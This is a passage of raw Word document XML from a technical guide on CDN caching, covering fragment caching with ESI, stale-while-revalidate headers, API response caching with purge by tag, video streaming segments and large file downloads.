    <w:p w14:paraId="6F1D7ECF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hit ratio target:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> 95–99% (virtually everything served from edge).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5996B6B8" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Origin bandwidth reduction:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> 95–99% (origin only handles initial miss + purges).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05ECA3DD" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.2 Dynamic Content — HTML Pages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625701CA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Server-rendered HTML that changes based on user state, content updates, personalization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEC9E8A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The challenge:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Content changes frequently, may be personalized → traditionally "uncacheable."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168AED27" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Strategies for caching dynamic content:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB89C8D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Fragment caching (Edge Side Includes — ESI):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475AAD95" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>HTML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC1F73B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>&lt;!-- Page template (cached for 1 hour) --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383684ED" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E96408E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  &lt;header&gt;&lt;!-- static nav, cached 24 hours --&gt;&lt;/header&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053753DE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  &lt;main&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36991BAE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    &lt;esi:include src="/fragments/product-123" /&gt;  &lt;!-- cached 1 hour --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC7A63F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">    &lt;esi:include src="/fragments/user-greeting" /&gt; &lt;!-- not cached (personalized) --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48419607" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">    &lt;esi:include src="/fragments/recommendations" /&gt; &lt;!-- cached 5 min --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17256DE7" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  &lt;/main&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F5E4DA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  &lt;footer&gt;&lt;!-- static, cached 24 hours --&gt;&lt;/footer&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21593FF0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F68B43" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>The CDN assembles the page from multiple fragments, each with its own TTL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48498891" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1266"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Static parts (header, footer): cached for days.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48090D00" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1266"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Semi-dynamic (product info): cached for hours.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E44892D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1266"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Personalized (user greeting): fetched from origin on every request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464F4476" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> 80% of the page is served from cache. Only 20% hits origin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0236C9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Cache with short TTL + stale-while-revalidate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FCA7A4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B82AA1" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Cache-Control: public, s-maxage=10, stale-while-revalidate=60</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28481345" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Content changes every few minutes, but serving 10-second-old content is acceptable. Users always get instant responses (stale during the 60-second window). Origin gets 1 request per 10 seconds per edge (not 1 per user request).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7017FB0E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Cache segmentation (vary on cookie/header):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630742BE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28985A34" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Logged-in users:  Vary on session → effectively uncached (unique per user)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C934EF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Logged-out users: Same page for everyone → cache aggressively (s-maxage=3600)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D00AFEE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Since 80%+ of traffic is often from non-logged-in users (crawlers, casual browsers), this alone can achieve 80%+ hit ratio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6A2816" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.3 API Responses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699099C0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> JSON/Protobuf responses from REST/GraphQL APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6738B5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When to cache API responses at CDN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F76F69" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1267"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>GET requests that are not user-specific (public product catalog, search results).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7A127F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1267"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t>Responses that don't change per-second (news feed, leaderboards, popular items).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322455A6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1267"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Results that are expensive to compute (search, recommendations — cache for 60 seconds saves 99% of compute).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F68E08" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When NOT to cache:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB3A2BF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1268"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>User-specific data (account balance, personal settings).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25774B0F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1268"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Write operations (POST, PUT, DELETE — never cached).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8757D6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1268"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Real-time data where staleness is unacceptable (live stock prices, chat messages).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F41A155" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>API caching pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D705A2" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFFE3D4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>GET /api/products?category=electronics&amp;page=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D41CE6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Cache-Control: public, s-maxage=300, stale-while-revalidate=60</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55657813" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Surrogate-Key: category-electronics products-list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BC468C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Cache key: GET|api.example.com|/api/products|category=electronics&amp;page=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EB33F0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>When products change:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7734582C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2795F5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Purge by tag: "category-electronics"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB0A927" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>→ All cached API responses for electronics category are invalidated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77560C24" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.4 Video/Streaming Content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1CAC27" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The unique challenges:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56051D5F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1269"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Large files (GB per video).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D44B11C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1269"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Range requests (user seeks to minute 45 → byte range 2GB–2.1GB).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4B52B7" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1269"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Adaptive bitrate (same video exists in 10+ quality levels).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B124A0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1269"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Live streaming (content doesn't exist yet — can't pre-cache).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D6E891" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How CDN handles video:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA4BF5E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>VOD (Video on Demand):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674E57EE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1270"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Video split into 2–10 second segments (HLS/DASH manifest + segments).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43903D0C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1270"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t>Each segment is independently cacheable (separate URL, separate cache entry).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F82CB4E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1270"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Manifest file (.m3u8 / .mpd): short TTL (points to segment URLs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BE2FED" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1270"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Segment files: long TTL (immutable content, versioned by sequence number).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4641609A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1270"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Popular videos: segments pre-populated at edges (push model).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5523D50D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1270"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Long-tail videos: pulled on-demand, evicted when cold.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB13D25" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Live streaming:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C83A415" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1271"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Encoder produces new segments every 2–6 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413AAC32" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1271"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Segments are pushed/pulled to edge within seconds of creation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02ECC998" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1271"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>TTL must be very short (&lt; segment duration) OR use purge for manifest updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FE6E03" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1271"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Challenge: the "live edge" — all viewers request the same newest segment simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCF3FDC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1271"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN handles this via request coalescing (many viewers, one origin fetch per segment per edge).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D1B270" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.5 Software Downloads and Large Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB75285" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> OS updates, game patches, application installers (100 MB – 100 GB).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E59E5E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Unique CDN requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F9651F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1272"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Byte-range support:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Resume interrupted downloads without re-downloading.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A94276" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1272"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Checksum verification:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Ensure downloaded file isn't corrupted (integrity).</w:t>
      </w:r>
    </w:p>
